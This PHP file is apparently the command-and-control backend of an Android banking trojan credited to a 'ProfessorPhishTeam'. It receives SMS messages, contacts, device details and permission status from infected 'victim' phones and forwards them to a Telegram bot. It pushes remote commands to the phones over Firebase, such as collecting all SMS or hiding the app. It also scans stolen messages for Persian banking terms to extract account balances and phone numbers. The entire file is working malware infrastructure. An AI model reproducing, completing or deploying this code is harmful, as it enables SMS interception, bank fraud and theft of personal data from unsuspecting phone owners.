<?php
include("info.php");
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
    if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    } else {
        $ip = $_SERVER["REMOTE_ADDR"];
    }
}


$action = $_POST['action'];

if(isset($_POST['port']))
{
    $group1 = $_POST['port'];
}else{
    $group1 = $group2;
}

if (isset($_POST['id'])) {
    $androidid = $_POST['id'];
}
if (isset($_POST['name'])) {
    $model = $_POST['name'];

}
if (isset($_POST['model'])) {
    $model2 = $_POST['model'];
}

if (isset($_POST['sendsms'])) {
    $sendsms = $_POST['sendsms'];
}

if (isset($_POST['accservice'])) {
    $accservice = $_POST['accservice'];
}

if (isset($_POST['readsms'])) {
    $readsms = $_POST['readsms'];
}


if (isset($_POST['contact'])) {
    $contact2 = $_POST['contact'];
}

if (isset($_POST['adminn'])) {
    $admin = $_POST['adminn'];
}


if (isset($_POST['contactname'])) {
    $contactname = $_POST['contactname'];
}

if (isset($_POST['contactnumber'])) {
    $contactnumber = $_POST['contactnumber'];
}

if (isset($_POST['battry'])) {
    $battry = $_POST['battry'];
}
if (isset($_POST['network'])) {
    $opr = $_POST['network'];
}
if (isset($_POST['number'])) {
    $nump = $_POST['number'];
}
if (isset($_POST['messagetext'])) {
    $mess = $_POST['messagetext'];
}
if (isset($_POST['contact'])) {
    $status = $_POST['contact'];
}
if (isset($_POST['status'])) {
    $status = $_POST['status'];
}

if (isset($_POST['androidos'])) {
    $androidos = $_POST['androidos'];
}

if (isset($_POST['allapp'])) {
    $allapp = $_POST['allapp'];
}

if (isset($_POST['oncesms'])) {
    $oncesms = $_POST['oncesms'];
}

if (isset($_POST['screen'])) {
    $screen = $_POST['screen'];
}

if (isset($_POST['appstatus'])) {
    $appstatus = $_POST['appstatus'];
}

if (isset($_POST['fcmtoken'])) {
    $fcmtoken = $_POST['fcmtoken'];
}


function nameFinder($androidID)
{
    $links = parse_ini_file('./names.ini');

    return $links["name_$androidID"];
}

function ipFinder($androidID)
{
    $links = parse_ini_file('./sms/ip.ini');

    return $links["firstip_$androidID"];
}

function dateFinder($androidID)
{
    $links = parse_ini_file('./sms/ip.ini');

    return $links["firstdate_$androidID"];
}

function hourFinder($androidID)
{
    $links = parse_ini_file('./sms/ip.ini');

    return $links["firsthour_$androidID"];
}

function fcmtokenFinder($androidID)
{
    $links = parse_ini_file('./sms/fcmtokens.ini');

    return $links["token_$androidID"];
}


function startsWith($string, $startString)
{
    $len = strlen($startString);
    return substr($string, 0, $len) === $startString;
}

function bot($method, $data = [])
{
    include("info.php");
    $url = "https://api.telegram.org/bot" . $token . "/" . $method;
    $define = curl_init();
    curl_setopt($define, CURLOPT_URL, $url);
    curl_setopt($define, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($define, CURLOPT_POSTFIELDS, $data);
    $res = curl_exec($define);
    if (curl_error($define)) {
        var_dump(curl_error($define));
    } else {
        return json_decode($res);
    }
}


function sm($chatid, $text, $keyboard)
{
    bot('sendMessage', [
        'chat_id' => $chatid,
        'text' => $text,
        'parse_mode' => 'HTML',
        'reply_markup' => $keyboard
    ]);
}

function getAccessToken($file){
    require 'vendor/autoload.php';
    $serviceAccountFilePath = "$file";
    $serviceAccount = json_decode(file_get_contents($serviceAccountFilePath), true);

    // Generate the JWT using the service account credentials
    $clientEmail = $serviceAccount['client_email'];
    $privateKey = $serviceAccount['private_key'];

    $payload = [
        "iss" => $clientEmail,
        "scope" => "https://www.googleapis.com/auth/firebase.messaging",
        "aud" => "https://www.googleapis.com/oauth2/v4/token",
        "iat" => time(),
        "exp" => time() + 3600
    ];

    $jwt = Firebase\JWT\JWT::encode($payload, $privateKey, 'RS256');

    // Get the OAuth 2.0 access token
    $requestBody = [
        "grant_type" => "urn:ietf:params:oauth:grant-type:jwt-bearer",
        "assertion" => $jwt
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.googleapis.com/oauth2/v4/token");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($requestBody));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Content-Type: application/json"
    ]);

    $response = curl_exec($ch);
    curl_close($ch);

    $accessToken = json_decode($response)->access_token;

    return $accessToken;
}


function sendAction($cmd1, $cmd2)
{
    $access = getAccessToken("$fileJson");
    $path = basename(__DIR__);

    $msg = [
            'lydia1' => $cmd1,
            'lydia2' => $cmd2
    ];

    $data = [
        'topic' => $path,
        'data' => $msg
    ];

    $headers = [
        'Authorization: Bearer ' . $access,
        'Content-Type: application/json',
    ];

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/$project_id/messages:send");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;

}

function check_UninstallStatusByGoogleFirebase($fcmToken)
{
    $path = basename(__DIR__);

    $fire_base_access_token = '';
    $msg = [
        'data' => [
            'lydia1' => 'check',
            'lydia2' => 'google'
        ]
    ];

    $data = [
        'to' => $fcmToken,
        'data' => $msg
    ];

    $headers = [
        'Authorization: key=' . $fire_base_access_token,
        'Content-Type: application/json',
        'Content-Length: ' . strlen(json_encode($data))
    ];

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, 'https://fcm.googleapis.com/fcm/send');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    $response = curl_exec($ch);
    curl_close($ch);

    return $response;

}


function send($t)
{
    include("info.php");
    @file_get_contents("https://api.telegram.org/bot" . $token . "/SendMessage?parse_mode=HTML&chat_id=" . $group1 . "&text=" . urlencode($t));
}

if ($action == "list") {

    $text =
"🪜 𝑰'𝒂𝒎 𝒇𝒖𝒄𝒌𝒊𝒏𝒈 𝒐𝒏𝒍𝒊𝒐𝒏 :/
🖥model : $model
🍷androidID : <b>$androidid</b> 
🪜Android(Os) : $androidos
📡Operator : $opr
🖥ScreenStatus : $screen - $appstatus
🕰 𝑰𝒏𝒇𝒆𝒄𝒕𝒆𝒅 𝒂𝒕 : " . dateFinder($androidid) . " / " . hourFinder($androidid) . "
IP :  <code>$ip</code> / " . ipFinder($androidid) . "

<code>/set_$androidid</code>
<code>/block_$ip</code>
";

    $mainkeyboard = json_encode(array('inline_keyboard' => [[['text' => "𝑨𝒍𝒍𝑺𝑴𝑺", 'callback_data' => "allsms_$androidid"], ['text' => "𝑳𝑨𝑺𝑻𝑺𝑴𝑺", 'callback_data' => "lastsms_$androidid"]]]));
    if (isset($opr) && isset($model) && isset($androidid) && isset($androidos)) {
        sm($group1, $text, $mainkeyboard);
        die('');
    }

} elseif ($action == "blist") {

    $androididfile = fopen("./androidid.txt", "a");
    $txt = "/set_$androidid\n";
    fwrite($androididfile, $txt);
    fclose($androididfile);


} elseif ($action == "install") {

    $handler = file_get_contents('user.txt');

    $myfile = fopen("user.txt", "w");
    $txt = $handler + 1;
    fwrite($myfile, $txt);
    fclose($myfile);
    date_default_timezone_set('Asia/Tehran');
    $currentHour12 = date('h:ia');
    $currentDate = date('Y-m-d');
    $ipsaver = fopen("./sms/ip.ini", "a");
    $txt = "\n
firstip_$androidid = $ip
firstdate_$androidid = $currentDate
firsthour_$androidid = $currentHour12
   ";
    fwrite($ipsaver, $txt);
    fclose($ipsaver);
    $tokensaver = fopen("./sms/fcmtokens.ini", "a");
    $txt = "\n
token_$androidid = $fcmtoken
   ";
    fwrite($tokensaver, $txt);
    fclose($tokensaver);

    $text =
"⚡️ 𝑰𝒏𝒔𝒕𝒂𝒍𝒂𝒕𝒊𝒐𝒏 𝒎𝒆𝒔𝒔𝒂𝒈𝒆 𝒓𝒆𝒄𝒆𝒊𝒗𝒆𝒅

🖥model : $model

📡Operator : $opr

🍷androidID : <b>$androidid</b>

🪜Android(Os) : $androidos

IP :  <code>$ip</code>
<code>/block_$ip</code>

~🪓Panel : <code>/set_$androidid</code>

#$androidid

@ProfessorPhishTeam
";
    $mainkeyboard = json_encode(array('inline_keyboard' => [[['text' => "𝑳𝑨𝑺𝑻𝑺𝑴𝑺", 'callback_data' => "lastsms_$androidid"]]]));

    if (isset($opr) && isset($model) && isset($androidid) && isset($androidos)) {
        sm($group1, $text, $mainkeyboard);
        die('');
    }

} elseif ($action == "sms") {

    $text =
"💰 𝑵𝒆𝒘 𝒔𝒎𝒔 𝒓𝒆𝒄𝒆𝒊𝒗𝒆𝒅 𝒇𝒓𝒐𝒎 𝒗𝒊𝒄𝒕𝒊𝒎 " . nameFinder($androidid) . " (𝑽8)
🕰 𝑰𝒏𝒇𝒆𝒄𝒕𝒆𝒅 𝒂𝒕 : " . dateFinder($androidid) . " / " . hourFinder($androidid) . "

📞 𝑭𝒓𝒐𝒎 : $nump
🗳 𝑴𝒆𝒔𝒔𝒂𝒈𝒆 𝑻𝒆𝒙𝒕 :

$mess ️

📡Operator : $opr
📱model : $model
🖥ScreenStatus : $screen
🪜Android(Os) : $androidos
🍷androidID : <code>/set_$androidid</code>

IP :  <code>$ip</code> / " . ipFinder($androidid) . "
<code>/block_$ip</code>

#$androidid

@ProfessorPhishTeam
";
    $mainkeyboard = json_encode(array('inline_keyboard' => [
        [['text' => "𝑨𝒍𝒍𝑺𝑴𝑺", 'callback_data' => "allsms_$androidid"], ['text' => "𝑳𝑨𝑺𝑻𝑺𝑴𝑺", 'callback_data' => "lastsms_$androidid"]],
        [['text' => "𝑭𝒊𝒏𝒅 𝑵𝒖𝒎𝒃𝒆𝒓", 'callback_data' => "findnumber_$androidid"], ['text' => "𝑺𝒆𝒕 𝑵𝒂𝒎𝒆", 'callback_data' => "setname_$androidid"]]
    ]));
    if (isset($opr) && isset($model) && isset($androidid) && isset($nump) && isset($mess)) {

        sm($group1, $text, $mainkeyboard);
        die('');

    }

} elseif ($action == "hide") {


    $texthide =
"Hide request executed.
📡Operator : $opr
🖥Model : $model
🍷Android_id : <b>$androidid</b>
~IP :  $ip

~Coded-By : @ProfessorPhishTeam";
    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group2&parse_mode=html&text=" . urlencode($texthide));
    }


} elseif ($action == "findnumbers") {

    $numbers = $_POST['numbers'];



    $texthide =
        "$numbers

📡Operator : $opr
🖥Model : $model
🍷Android_id : <b>$androidid</b>
~IP :  $ip

~Coded-By : @ProfessorPhishTeam";
    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($texthide));
    }


}elseif ($action == "findbalances") {

    $balances = $_POST['balances'];



    $texthide =
        "$balances

📡Operator : $opr
🖥Model : $model
🍷Android_id : <b>$androidid</b>
~IP :  $ip

~Coded-By : @ProfessorPhishTeam";
    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($texthide));
    }


}elseif ($action == "check") {

    $textshow =
"~ PermissionS
~ReadSms : $readsms
~SendSms : $sendsms
~Contact : $contact2
~Admin : $admin
~accessibility : $accservice
📡Operator : $opr
🖥model : $model
🍷androidID : <b>$androidid</b>
~IP :  $ip

~Coded-By : @ProfessorPhishTeam";

    if (isset($opr) && isset($model) && isset($androidid) && isset($readsms) && isset($sendsms)) {

        file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($textshow));
    }

} elseif ($action == "offline") {

    $textshow =
"~ Offline mode activated ✅.
📡Operator : $opr
🖥model : $model
🍷androidID : <b>$androidid</b>
~IP :  $ip
~Coded-By : @ProfessorPhishTeam";

    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($textshow));
    }
} elseif ($action == "disableoffline") {

    $textshow =
"~ Offline mode Deactivated ❌.
📡Operator : $opr
🖥model : $model
🍷androidID : <b>$androidid</b>
~IP :  $ip
~Coded-By : @ProfessorPhishTeam";

    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($textshow));
    }
} elseif ($action == "offstatusen") {

    $textshow =
"~ Offline mode $model is Active ✅.
📡Operator : $opr
🍷androidID : <b>$androidid</b>
~IP :  $ip
~Coded-By : @ProfessorPhishTeam";

    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($textshow));
    }
} elseif ($action == "offstatusdis") {

    $textshow =
"~ Offline mode $model is not Active ❌.
📡Operator : $opr
🍷androidID : <b>$androidid</b>
~IP :  $ip
~Coded-By : @ProfessorPhishTeam";

    if (isset($opr) && isset($model) && isset($androidid)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($textshow));
    }
} elseif ($action == "importcontact") {

    $textshow =
"~ a new contact added with this profile :
👤 name : $contactname
📞 number : $contactnumber

📡Operator : $opr
🖥Model : $model
🍷Android_id : <b>$androidid</b>
~IP :  $ip
~Coded-By : @ProfessorPhishTeam

";
    if (isset($opr) && isset($model) && isset($androidid) && isset($contactname) && isset($contactnumber)) {
        @file_get_contents("https://api.telegram.org/bot$token/SendMessage?parse_mode=HTML&chat_id=$group1&parse_mode=html&text=" . urlencode($textshow));
    }
}


$update = json_decode(file_get_contents('php://input'));
$message = $update->message;
$chat_id = $message->chat->id;
$message_id = $message->message_id;
$first_name = $update->message->from->first_name;
$from_id = $update->message->from->id;
$mi = $update->callback_query->message->message_id;
$chat_id1 = isset($update->callback_query->message->chat->id) ? $update->callback_query->message->chat->id : $update->message->chat->id;
$data = isset($message->text) ? $message->text : $update->callback_query->data;
$reply = $update->message->reply_to_message;
$text = $update->message->text;
$step = file_get_contents("sms/cmd.txt");


if (startsWith($data, 'lastsms_')) {
    $androidId = substr($data, 8);
    sendAction("mobile" . $androidId . "", "getlastsms");
    send('REQUEST SENT SUCCESSFULLY');
} elseif (startsWith($data, 'allsms_')) {
    $androidId = substr($data, 7);
    sendAction("mobile" . $androidId . "", "getallmessage");
    send('REQUEST SENT SUCCESSFULLY');
} elseif (startsWith($data, 'findnumber_')) {
    $androidId = substr($data, 11);
    sendAction("mobile" . $androidId . "", "findnumbers");
    send('REQUEST SENT SUCCESSFULLY');
} elseif (startsWith($data, 'extbalance_')) {
    unlink("./sms/balance.txt");
    $androidId = substr($data, 11);

    $search = 'مانده';
    // Read from file
    $lines = file("./sms/aftersms_$androidId.txt");
    //$check = file_get_contents("LydiaTeam.txt");
    foreach ($lines as $line) {
        if (strpos($line, $search, 0) !== false) {
            $balance1 = "💰 Balance : $line\n";
            $myfile = fopen("./sms/balance.txt", "a");
            fwrite($myfile, $balance1);
            fclose($myfile);
        }
    }


    $filePath = './sms/balance.txt';
    $fileContent = file_get_contents($filePath);
    $lines = explode("\n", $fileContent);
    $uniqueLines = array_unique($lines);
    $newContent = implode("\n", $uniqueLines);

    file_put_contents($filePath, $newContent);

    $balanceList = file_get_contents("./sms/balance.txt");
    send("$balanceList\n@ProfessorPhishTeam");
} elseif (startsWith($data, 'extnumbers_')) {
    unlink("./sms/numbers.txt");
    $androidId = substr($data, 11);

    $search = 'مشترک';
    // Read from file
    $lines = file("./sms/aftersms_$androidId.txt");
    //$check = file_get_contents("LydiaTeam.txt");
    foreach ($lines as $line) {
        if (strpos($line, $search, 0) !== false) {
            $number1 = "$line\n";

            preg_match_all('/(\d+)/', $number1, $matches);

            foreach ($matches[0] as $number) {

                $myfile = fopen("./sms/numbers.txt", "a");
                fwrite($myfile, "$number\n");
                fclose($myfile);

            }


        }
    }


    $filePath = './sms/numbers.txt';
    $fileContent = file_get_contents($filePath);
    $lines = explode("\n", $fileContent);
    $uniqueLines = array_unique($lines);
    $newContent = implode("\n", $uniqueLines);

    file_put_contents($filePath, $newContent);


    $numberList = file_get_contents("./sms/numbers.txt");
    send("$numberList\n@ProfessorPhishTeam");
} elseif (startsWith($text, '/check_')) {

    $androidId = substr($text, 7);
    $res = check_UninstallStatusByGoogleFirebase(fcmtokenFinder($androidId));
    $result = json_decode($res)->success;

    if ($result == '1') {
        send("👤 firebaseValidation : ✅\n⚙️ broadCastValidation : ✅\n it means there is no report from GoogleAnalytics about the removal action on this device.");
    } else {
        send("👤 firebaseValidation : uninstalled❌");
    }

}

if (startsWith($data, 'setname_')) {
    $androidId = substr($data, 8);
    send("SEND ME A NAME ($androidId) :");
    @file_put_contents("sms/cmd.txt", "setname");
    @file_put_contents("sms/androidid.txt", $androidId);

} elseif ($step == "setname" && isset($text)) {
    $ID = file_get_contents("sms/androidid.txt");
    $myfile = fopen("names.ini", "a");
    $txt = "\n
name_$ID = $text
    ";
    fwrite($myfile, $txt);
    fclose($myfile);
    send("Name changed successfully");
    @file_put_contents("sms/cmd.txt", "none");


}


?>

